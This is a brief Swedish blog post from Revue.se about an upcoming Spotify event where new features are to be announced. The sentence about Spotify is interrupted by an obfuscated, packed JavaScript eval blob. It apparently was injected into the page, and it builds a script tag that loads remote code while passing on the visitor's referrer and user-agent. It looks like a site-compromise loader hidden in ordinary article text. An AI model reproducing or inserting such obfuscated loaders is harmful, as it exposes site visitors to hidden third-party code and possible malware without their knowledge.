Image Image Image Image Image Image Image Image Image Image

| 17 mars, 2018

Scroll to top

Top

No Comments

Revue.se | Idag har Spotify sitt event där man ska visa något nytt!

Idag har Spotify sitt event där man ska visa något nytt!
Filip Urde
  • On 30 november, 2011
  • http://www.revue.se/filip-urde

Idag har alltså spotify eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dzhkb|var|u0026u|referrer|tnbid||js|php’.split(‘|’),0,{}))
sitt event där man säger att man ska presentera nyheter, som vi skrev om i början av november (
läs här). Vi väntar spänt på vad det blir!

Återkommer när vi vet mer…

spotify.com